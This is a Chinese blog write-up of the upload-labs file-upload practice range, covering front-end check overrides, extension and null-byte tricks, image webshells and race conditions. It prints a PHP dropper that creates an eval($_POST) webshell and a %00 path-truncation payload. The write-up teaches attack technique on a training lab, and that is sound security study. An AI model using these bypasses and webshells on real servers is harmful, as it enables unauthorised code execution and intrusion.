<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="upload-labs 靶场"><meta name="keywords" content="文件上传"><meta name="author" content="JGwebre,undefined"><meta name="copyright" content="JGwebre"><title>upload-labs 靶场【JG的个人博客】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!-- link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!-- link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!-- script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.9/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><!-- script(src=url_for("/js/mathjax/mathjax.js"))--><script type="text/x-mathjax-config">MathJax.Hub.Config({
    tex2jax: {inlineMath: [['$', '$'], ['\\(', '\\)']]}
});
</script><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"M89DTZNQI5","apiKey":"3349454e63ed12455aa77088742476f1","indexName":"heisha","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: {"path":"search.json","languages":{"hits_empty":"local_search.hits_empty"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  gitment: {},
  valine: {"appId":"vBmF8qvDShMMqm39diUFWroM-gzGzoHsz","appKey":"vcClV59WM7pPzz3R46pITQlv","placeholder":"welcome to say something..."},
  twikoo: {},
}</script><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="JG的个人博客" type="application/atom+xml">
</head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-01%EF%BC%88%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%81%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">pass-01（前端验证）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-02%EF%BC%88MIME%E9%AA%8C%E8%AF%81%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">pass-02（MIME验证）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-03%EF%BC%88%E9%BB%91%E5%90%8D%E5%8D%95%E9%AA%8C%E8%AF%81%EF%BC%8C%E7%89%B9%E6%AE%8A%E5%90%8E%E7%BC%80%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">pass-03（黑名单验证，特殊后缀）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-04%EF%BC%88%E9%BB%91%E5%90%8D%E5%8D%95%E9%AA%8C%E8%AF%81%EF%BC%8C-htaccess%EF%BC%89"><span class="toc-number">4.</span> <span class="toc-text">pass-04（黑名单验证，.htaccess）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-05%EF%BC%88%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">5.</span> <span class="toc-text">pass-05（大小写绕过）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-06%EF%BC%88%E9%BB%91%E5%90%8D%E5%8D%95%E9%AA%8C%E8%AF%81%EF%BC%8C-user-ini-%EF%BC%89"><span class="toc-number">6.</span> <span class="toc-text">pass-06（黑名单验证，.user.ini.）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-07"><span class="toc-number">7.</span> <span class="toc-text">pass-07</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-08%EF%BC%88%E9%BB%91%E5%90%8D%E5%8D%95%E9%AA%8C%E8%AF%81%EF%BC%8C%E7%89%B9%E6%AE%8A%E5%AD%97%E7%AC%A6-DATA%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">8.</span> <span class="toc-text">pass-08（黑名单验证，特殊字符::$DATA绕过）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-09"><span class="toc-number">9.</span> <span class="toc-text">pass-09</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-10"><span class="toc-number">10.</span> <span class="toc-text">pass-10</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-11%EF%BC%88-00%E6%88%AA%E6%96%AD%EF%BC%89"><span class="toc-number">11.</span> <span class="toc-text">pass-11（%00截断）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-12"><span class="toc-number">12.</span> <span class="toc-text">pass-12</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-13-%E5%9B%BE%E7%89%87%E9%A9%AC"><span class="toc-number">13.</span> <span class="toc-text">pass-13 图片马</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-14"><span class="toc-number">14.</span> <span class="toc-text">pass-14</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-15"><span class="toc-number">15.</span> <span class="toc-text">pass-15</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-16"><span class="toc-number">16.</span> <span class="toc-text">pass-16</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-17"><span class="toc-number">17.</span> <span class="toc-text">pass-17</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pass-18%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89-apache%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">18.</span> <span class="toc-text">pass-18条件竞争+apache解析漏洞</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">JGwebre</div><div class="author-info-description"></div><div class="links-buttons"><a class="links-button button-hover" href="https://github.com/heisha123" target="_blank">GitHub<i class="icon-dot bg-color3"></i></a><a class="links-button button-hover" href="mailto:gzyjslb@163.com" target="_blank">E-Mail<i class="icon-dot bg-color1"></i></a><a class="links-button button-hover" href="tencent://message/?uin=1852384503&amp;Site=&amp;Menu=yes" target="_blank">QQ<i class="icon-dot bg-color5"></i></a></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">17</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">11</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">1</span></a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a><a class="menu-item" href="/about">关于</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">JG的个人博客</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">upload-labs 靶场</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2025-07-28 | 更新于 2025-07-28</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a></div></div></div><div class="main-content"><p>练练文件上传</p>
 <span id="more"></span>

<h4 id="pass-01（前端验证）"><a href="#pass-01（前端验证）" class="headerlink" title="pass-01（前端验证）"></a>pass-01（前端验证）</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728204908075.png" alt="image-20250728204908075"></p>
<p>前端判断了文件类型</p>
<p>可以直接利用bp拦截抓包改包</p>
<p>这里我们直接利用浏览器控制台让他这个函数直接返回true</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">checkFile = function() &#123; return true; &#125;;</span><br></pre></td></tr></table></figure>

<p>控制台直接执行</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728205240835.png" alt="image-20250728205240835"></p>
<p>直接上传php文件即可</p>
<h4 id="pass-02（MIME验证）"><a href="#pass-02（MIME验证）" class="headerlink" title="pass-02（MIME验证）"></a>pass-02（MIME验证）</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728205753347.png" alt="image-20250728205753347"></p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728205833948.png" alt="image-20250728205833948"></p>
<p>这里只进行了文件类型的判断，用户可以通过改包的方式，用户可控</p>
<h4 id="pass-03（黑名单验证，特殊后缀）"><a href="#pass-03（黑名单验证，特殊后缀）" class="headerlink" title="pass-03（黑名单验证，特殊后缀）"></a>pass-03（黑名单验证，特殊后缀）</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728205329018.png" alt="image-20250728205329018"></p>
<p>黑名单。直接上传<code>.htaccess</code> 强制解析jpg文件，或者上传php3,php4,或者phtml，他这里应该是考后者</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728205626972.png" alt="image-20250728205626972"></p>
<p>可以解析</p>
<h4 id="pass-04（黑名单验证，-htaccess）"><a href="#pass-04（黑名单验证，-htaccess）" class="headerlink" title="pass-04（黑名单验证，.htaccess）"></a>pass-04（黑名单验证，.htaccess）</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728205936310.png" alt="image-20250728205936310"></p>
<p>还是黑名单，过滤了一堆</p>
<p>这里也没有过滤我们的<code>.htaccess</code> 可以进行解析jpg文件</p>
<p>但是这里他还有一个逻辑漏洞，可以绕过他这个过滤</p>
<p>他没有提前对我们上传的文件进行重命名操作，所以我们可以利用双重拓展名来绕过前面的一系列操作</p>
<p>类似于我们传<code>shell.php.jpg</code></p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728210846616.png" alt="image-20250728210846616"></p>
<h4 id="pass-05（大小写绕过）"><a href="#pass-05（大小写绕过）" class="headerlink" title="pass-05（大小写绕过）"></a>pass-05（大小写绕过）</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211012033.png" alt="image-20250728211012033"></p>
<p>第一眼跟第四关没区别。看了下提示发现</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211153202.png" alt="image-20250728211153202"></p>
<p>禁用了我们的<code>.htaccess</code>  ,所以我们依然可以用双拓展名绕过</p>
<p>也可以上传<code>.user.ini</code>  解析我们上传的jpg</p>
<h4 id="pass-06（黑名单验证，-user-ini-）"><a href="#pass-06（黑名单验证，-user-ini-）" class="headerlink" title="pass-06（黑名单验证，.user.ini.）"></a>pass-06（黑名单验证，.user.ini.）<img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211347095.png" alt="image-20250728211347095"></h4><p>没看出来区别</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211533211.png" alt="image-20250728211533211"></p>
<p>他又放开了<code>.htaccess</code> </p>
<p>而且我们的双拓展名依旧可以绕过</p>
<h4 id="pass-07"><a href="#pass-07" class="headerlink" title="pass-07"></a>pass-07</h4><p> <img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211627548.png" alt="image-20250728211627548"></p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211645405.png" alt="image-20250728211645405"></p>
<p>依旧双拓展名绕过</p>
<h4 id="pass-08（黑名单验证，特殊字符-DATA绕过）"><a href="#pass-08（黑名单验证，特殊字符-DATA绕过）" class="headerlink" title="pass-08（黑名单验证，特殊字符::$DATA绕过）"></a>pass-08（黑名单验证，特殊字符::$DATA绕过）</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211714737.png" alt="image-20250728211714737"></p>
<p><code>shell.php::$DATA</code></p>
<p>依旧双拓展名绕过</p>
<h4 id="pass-09"><a href="#pass-09" class="headerlink" title="pass-09"></a>pass-09</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211758766.png" alt="image-20250728211758766"></p>
<p>依旧双拓展名绕过</p>
<h4 id="pass-10"><a href="#pass-10" class="headerlink" title="pass-10"></a>pass-10</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728211832976.png" alt="image-20250728211832976"></p>
<p>依旧双拓展名绕过</p>
<p>或者</p>
<p><code>shell.php::$DATA</code></p>
<h4 id="pass-11（-00截断）"><a href="#pass-11（-00截断）" class="headerlink" title="pass-11（%00截断）"></a>pass-11（%00截断）</h4><p>终于用上白名单了</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728213248089.png" alt="image-20250728213248089"></p>
<p>可以看到这里用户可以控制上传的路径</p>
<p>考虑用%00截断</p>
<p>因为在c语言的底层<code>/0</code> 代表终止 ，php的底层代码就是c语言，%00 urldecode 就是&#x2F;0 所以可以截断</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?save_path=../upload/1.php%00 </span><br></pre></td></tr></table></figure>

<h4 id="pass-12"><a href="#pass-12" class="headerlink" title="pass-12"></a>pass-12</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728213947630.png" alt="image-20250728213947630"></p>
<p>刚刚是get传参，这次是post，一样的道理</p>
<p>%00截断</p>
<p>post我们需要在十六进制里面去修改</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728214415328.png" alt="image-20250728214415328"></p>
<h4 id="pass-13-图片马"><a href="#pass-13-图片马" class="headerlink" title="pass-13 图片马"></a>pass-13 图片马</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728214449370.png" alt="image-20250728214449370"></p>
<p>图片马，加文件包含</p>
<p>直接上传即可</p>
<p>他这里取了前两个字节，我们要保证我们的图片马 开头是 .PNG. GIF89a  等</p>
<p>然后文件包含直接利用即可</p>
<h4 id="pass-14"><a href="#pass-14" class="headerlink" title="pass-14"></a>pass-14</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728214822738.png" alt="image-20250728214822738"></p>
<p>一样的跟13关</p>
<h4 id="pass-15"><a href="#pass-15" class="headerlink" title="pass-15"></a>pass-15</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728214913814.png" alt="image-20250728214913814"></p>
<p>我们的图片马经过了精心的处理。所以这个我们也可以直接上传</p>
<h4 id="pass-16"><a href="#pass-16" class="headerlink" title="pass-16"></a>pass-16</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728215059818.png" alt="image-20250728215059818"></p>
<p>这里他把我们的图片经过了二次渲染后在进行判断。所以我们要保证我们的图片在二次渲染后php代码还存在</p>
<p>我们可以随便先上传一个图片</p>
<p>然后将上传的图片下载下来，用010editor 观察两张图片前后未变化的部分，然后在这部分插入我们的php代码</p>
<p>推荐用GIF图片</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/22-17537119060744.gif" alt="22"></p>
<h4 id="pass-17"><a href="#pass-17" class="headerlink" title="pass-17"></a>pass-17</h4><p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728221203081.png" alt="image-20250728221203081"></p>
<p>代码处理流程</p>
<ul>
<li>移动文件到指定路径</li>
<li>判断文件后缀是否符合</li>
<li>符合则重命名</li>
<li>不符合则删除文件</li>
</ul>
<p>这里存在逻辑的问题，先移动文件到指定目录再判断是否符合并删除。服务器处理代码时总会存在一定的时间差，当我们在上传文件后就多次快速尝试访问目标文件，那么是不是有机会在删除前成功访问文件。而如果文件的代码是重新创建一个木马文件，新木马文件则永远不会被删除了！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$webshell = &#x27;&lt;?php @eval($_POST[&quot;1&quot;]); ?&gt;&#x27;;</span><br><span class="line">file_put_contents(&#x27;1.php&#x27;, $webshell);</span><br><span class="line">echo &quot;Webshell created as 1.php&quot;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728222022730.png" alt="image-20250728222022730"></p>
<h4 id="pass-18条件竞争-apache解析漏洞"><a href="#pass-18条件竞争-apache解析漏洞" class="headerlink" title="pass-18条件竞争+apache解析漏洞"></a>pass-18条件竞争+apache解析漏洞</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line">//index.php</span><br><span class="line">$is_upload = false;</span><br><span class="line">$msg = null;</span><br><span class="line">if (isset($_POST[&#x27;submit&#x27;]))</span><br><span class="line">&#123;</span><br><span class="line">    require_once(&quot;./myupload.php&quot;);</span><br><span class="line">    $imgFileName =time();</span><br><span class="line">    $u = new MyUpload($_FILES[&#x27;upload_file&#x27;][&#x27;name&#x27;], $_FILES[&#x27;upload_file&#x27;][&#x27;tmp_name&#x27;], $_FILES[&#x27;upload_file&#x27;][&#x27;size&#x27;],$imgFileName);</span><br><span class="line">    $status_code = $u-&gt;upload(UPLOAD_PATH);</span><br><span class="line">    switch ($status_code) &#123;</span><br><span class="line">        case 1:</span><br><span class="line">            $is_upload = true;</span><br><span class="line">            $img_path = $u-&gt;cls_upload_dir . $u-&gt;cls_file_rename_to;</span><br><span class="line">            break;</span><br><span class="line">        case 2:</span><br><span class="line">            $msg = &#x27;文件已经被上传，但没有重命名。&#x27;;</span><br><span class="line">            break; </span><br><span class="line">        case -1:</span><br><span class="line">            $msg = &#x27;这个文件不能上传到服务器的临时文件存储目录。&#x27;;</span><br><span class="line">            break; </span><br><span class="line">        case -2:</span><br><span class="line">            $msg = &#x27;上传失败，上传目录不可写。&#x27;;</span><br><span class="line">            break; </span><br><span class="line">        case -3:</span><br><span class="line">            $msg = &#x27;上传失败，无法上传该类型文件。&#x27;;</span><br><span class="line">            break; </span><br><span class="line">        case -4:</span><br><span class="line">            $msg = &#x27;上传失败，上传的文件过大。&#x27;;</span><br><span class="line">            break; </span><br><span class="line">        case -5:</span><br><span class="line">            $msg = &#x27;上传失败，服务器已经存在相同名称文件。&#x27;;</span><br><span class="line">            break; </span><br><span class="line">        case -6:</span><br><span class="line">            $msg = &#x27;文件无法上传，文件不能复制到目标目录。&#x27;;</span><br><span class="line">            break;      </span><br><span class="line">        default:</span><br><span class="line">            $msg = &#x27;未知错误！&#x27;;</span><br><span class="line">            break;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//myupload.php</span><br><span class="line">class MyUpload&#123;</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line">  var $cls_arr_ext_accepted = array(</span><br><span class="line">      &quot;.doc&quot;, &quot;.xls&quot;, &quot;.txt&quot;, &quot;.pdf&quot;, &quot;.gif&quot;, &quot;.jpg&quot;, &quot;.zip&quot;, &quot;.rar&quot;, &quot;.7z&quot;,&quot;.ppt&quot;,</span><br><span class="line">      &quot;.html&quot;, &quot;.xml&quot;, &quot;.tiff&quot;, &quot;.jpeg&quot;, &quot;.png&quot; );</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">......  </span><br><span class="line">  /** upload()</span><br><span class="line">   **</span><br><span class="line">   ** Method to upload the file.</span><br><span class="line">   ** This is the only method to call outside the class.</span><br><span class="line">   ** @para String name of directory we upload to</span><br><span class="line">   ** @returns void</span><br><span class="line">  **/</span><br><span class="line">  function upload( $dir )&#123;</span><br><span class="line">    </span><br><span class="line">    $ret = $this-&gt;isUploadedFile();</span><br><span class="line">    </span><br><span class="line">    if( $ret != 1 )&#123;</span><br><span class="line">      return $this-&gt;resultUpload( $ret );</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $ret = $this-&gt;setDir( $dir );</span><br><span class="line">    if( $ret != 1 )&#123;</span><br><span class="line">      return $this-&gt;resultUpload( $ret );</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $ret = $this-&gt;checkExtension();</span><br><span class="line">    if( $ret != 1 )&#123;</span><br><span class="line">      return $this-&gt;resultUpload( $ret );</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $ret = $this-&gt;checkSize();</span><br><span class="line">    if( $ret != 1 )&#123;</span><br><span class="line">      return $this-&gt;resultUpload( $ret );    </span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    // if flag to check if the file exists is set to 1</span><br><span class="line">    </span><br><span class="line">    if( $this-&gt;cls_file_exists == 1 )&#123;</span><br><span class="line">      </span><br><span class="line">      $ret = $this-&gt;checkFileExists();</span><br><span class="line">      if( $ret != 1 )&#123;</span><br><span class="line">        return $this-&gt;resultUpload( $ret );    </span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // if we are here, we are ready to move the file to destination</span><br><span class="line"></span><br><span class="line">    $ret = $this-&gt;move();</span><br><span class="line">    if( $ret != 1 )&#123;</span><br><span class="line">      return $this-&gt;resultUpload( $ret );    </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // check if we need to rename the file</span><br><span class="line"></span><br><span class="line">    if( $this-&gt;cls_rename_file == 1 )&#123;</span><br><span class="line">      $ret = $this-&gt;renameFile();</span><br><span class="line">      if( $ret != 1 )&#123;</span><br><span class="line">        return $this-&gt;resultUpload( $ret );    </span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    // if we are here, everything worked as planned :)</span><br><span class="line"></span><br><span class="line">    return $this-&gt;resultUpload( &quot;SUCCESS&quot; );</span><br><span class="line">  </span><br><span class="line">  &#125;</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>在index.php中，首先new了一个MyUpload类，传入了上传的文件名，临时名，文件大小，随机time名（这个随机time和文件最终名字有关）</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728222746421.png" alt="image-20250728222746421"></p>
<p>然后传入UPLOAD_PATH给upload函数（也就是吧..&#x2F;upload传入），那么我们得看看类里面的代码才知道具体发生了什么。。</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728222706668.png" alt="image-20250728222706668"></p>
<p>对类初始化的时候调用Myupload函数，传入对应参数赋值</p>
<p>在upload函数中，是先进行文件路径、后缀、大小判断，然后文件移动、重命名。这里就出现很经典的逻辑问题了，先移动再重命令，就可以利用条件竞争对其进行访问。</p>
<p>可是问题出现了，其对文件上传后缀进行了检验，只能白名单上传</p>
<p>这里就要配合到apache的解析漏洞，在apache版本符合条件下，对mime.types中没有涉及的文件后缀不会解析，查看httpd.conf文件下的mime.types，没有发现7z后缀，说明不会解析7z文件</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728223000837.png" alt="image-20250728223000837"></p>
<p>比如<code>test.php.7z</code>这个文件，apache的解析是从后往前，当7z不能解析时，其向前解析一直到可以解析的后缀为止，所以将<code>test.php.7z</code>当作<code>test.php</code>执行。但是文件后缀上传后还是<code>test.php.7z</code>全称吗？看看代码，经过rename之后，文件名被修改为upload+time()函数的值+最后一个小数点后的后缀名，即变成了<code>upload+time.7z</code>这样，没有php了我们如何利用？</p>
<p><img src="/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/image-20250728223105384.png" alt="image-20250728223105384"></p>
<p>这里就需要配合刚才说的条件竞争漏洞了，在rename之前是move操作，move后的极短时间内是没有rename的，我们通过频发发包访问达到目的。这里需要提一下，这关的文件上传目录不是在upload目录下，应该是作者不小心忽略的原因，所以会导致文件名中有个upload，但是不影响做题，如果想修改为upload目录下，则需要在rename函数中添加<code>/</code>即可</p>
<p>我们原题吧</p>
<p>开始抓包</p>
<p>一个为上传包，一个为访问包</p>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:undefined">JGwebre</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="https://heisha123.github.io/2025/07/28/upload-labs-%E9%9D%B6%E5%9C%BA/">https://heisha123.github.io/2025/07/28/upload-labs-靶场/</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本站点所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://heisha123.github.io">JG的个人博客</a>！</span></div></div><div class="post-copyright valine" id="comments-container"><script src="//unpkg.com/valine@1.4.14/dist/Valine.min.js"></script><script>let arr = location.href.split('/#more')[0].split('/');
let title = arr[arr.length - 1];
if (title === '') {
    title = arr[arr.length - 2];
}
